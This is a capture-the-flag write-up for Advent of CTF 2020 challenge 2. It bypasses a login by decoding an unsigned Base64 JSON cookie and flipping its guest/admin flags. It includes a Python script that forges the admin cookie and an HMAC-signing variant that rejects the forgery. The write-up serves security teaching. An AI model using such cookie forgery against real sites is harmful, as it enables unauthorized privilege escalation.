
Write-Up Advent of CTF 2020 Challenge 2

Overview

The NOVI University of Applied Sciences is running an Advent CTF for December 2020. The CTF is created by Hackdewereld.nl community member and Chief Lecturer for Cyber Security at NOVI University, Arjen Wiersma. If you want to participate in these challenges, you can create an account on the website https://www.adventofctf.com/.

Challenge 2

  • Description: For the second challenge you will need to bypass the login mechanism.
  • 200 Points

I visited the URL https://02.adventofctf.com and landed on a page with a login form. Below the form the hint "Do not try too hard." is shown.

[Screenshot: advent-of-ctf-challenge-2-bypass-login]

I tried a SQL injection payload and a few default username/password combinations. After clicking Submit I was redirected to the next page, apparently logged in as Guest.

[Screenshot: advent-of-ctf-2-logged-in-as-guest]

This user does not have the privileges to see the flag, so I need to escalate to admin. Given the hint, there is probably no need to dig deep: let's look at the cookie the site stored in the browser, using the Developer Tools.

[Screenshot: advent-of-ctf-2-stored-cookie]

This is my cookie:

authenticated:"eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D"

The value is URL-encoded Base64 (the trailing %3D is a URL-encoded = padding character). Decoding it with CyberChef reveals the data the cookie carries, a small JSON object: {"guest":"true","admin":"false"}. Note that the flags are the strings "true" and "false", not JSON booleans.

[Screenshot: advent-of-ctf-2-cookie-value]

So the cookie states that guest is "true" and admin is "false". Nothing signs or encrypts it, which means the browser is trusted to declare its own privilege level. I change the object to guest "false" and admin "true", Base64-encode the JSON again, URL-encode the trailing = back to %3D, and replace the cookie value in the browser. This is my new cookie value.

[Screenshot: advent-of-ctf-2-new-cookie-value]

After updating the cookie in my browser to the new value and refreshing the page, the flag is visible: NOVI{cookies_are_bad_for_auth}. The flag text says it all: authorization state that the client can rewrite is not authorization.

[Screenshot: advent-of-ctf-2-the-flag]
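The same decode/modify/re-encode steps as a script, plus the server-side fix the flag hints at. This is an added example written for this write-up, not code from the challenge or its author: the decode and forge functions operate on the real cookie value quoted above; the signing half is a hypothetical hardened version in which the server attaches an HMAC-SHA256 tag under a secret the browser never sees (the secret here is constructed for the example), so a forged admin claim is rejected instead of trusted.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional
from urllib.parse import quote, unquote

# The cookie value as copied from the browser in the write-up:
# URL-encoded Base64 of a JSON object (the %3D is an encoded '=').
ORIGINAL_COOKIE = "eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D"


def decode_cookie(value: str) -> dict:
    """URL-decode, Base64-decode, then parse the JSON the challenge stores client-side."""
    raw = base64.b64decode(unquote(value))
    return json.loads(raw)


def encode_cookie(claims: dict) -> str:
    """Inverse of decode_cookie: compact JSON -> Base64 -> URL-encode ('=' becomes %3D)."""
    raw = json.dumps(claims, separators=(",", ":")).encode()
    return quote(base64.b64encode(raw).decode(), safe="")


def forge_admin_cookie(value: str) -> str:
    """Flip the two string-valued flags exactly as done by hand in the write-up."""
    claims = decode_cookie(value)
    claims["guest"] = "false"
    claims["admin"] = "true"
    return encode_cookie(claims)


# --- Hypothetical hardened version: the server signs what it hands out -------
# Constructed secret for this example only; a real server keeps it out of the client.
SERVER_SECRET = b"example-only-secret-do-not-reuse"


def sign_cookie(claims: dict, secret: bytes = SERVER_SECRET) -> str:
    """Append an HMAC-SHA256 tag over the encoded payload: '<payload>.<hex tag>'."""
    payload = encode_cookie(claims)
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_cookie(signed: str, secret: bytes = SERVER_SECRET) -> Optional[dict]:
    """Return the claims only if the tag matches; None means tampered or forged."""
    payload, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return decode_cookie(payload)


def tamper_signed_cookie(signed: str) -> str:
    """Attacker model: rewrite the payload to the admin version but keep the old tag."""
    payload, _, tag = signed.rpartition(".")
    return f"{forge_admin_cookie(payload)}.{tag}"


if __name__ == "__main__":
    print("decoded :", decode_cookie(ORIGINAL_COOKIE))
    print("forged  :", forge_admin_cookie(ORIGINAL_COOKIE))
    signed = sign_cookie(decode_cookie(ORIGINAL_COOKIE))
    print("signed  :", verify_cookie(signed))
    print("tampered:", verify_cookie(tamper_signed_cookie(signed)))
```

Running the script prints the decoded guest cookie, the forged admin value you can paste into the browser, and then shows that the same forgery against the signed variant comes back as None. Signing stops the client from editing the claims; it does not hide them, so anything secret still belongs in a server-side session rather than in the cookie at all.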

Thanks for reading!

This post is licensed under CC BY 4.0 by the author.